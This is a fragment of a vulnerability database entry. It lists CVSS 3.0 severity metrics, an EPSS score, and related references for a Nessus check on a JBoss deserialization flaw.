NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.008 Low

EPSS

Percentile

81.6%

JSON
Related for JBOSS_ON_DESERIALIZE_CC.NASL
redhatcve2nvd2openvas1cve2cvelist2prion2redhat1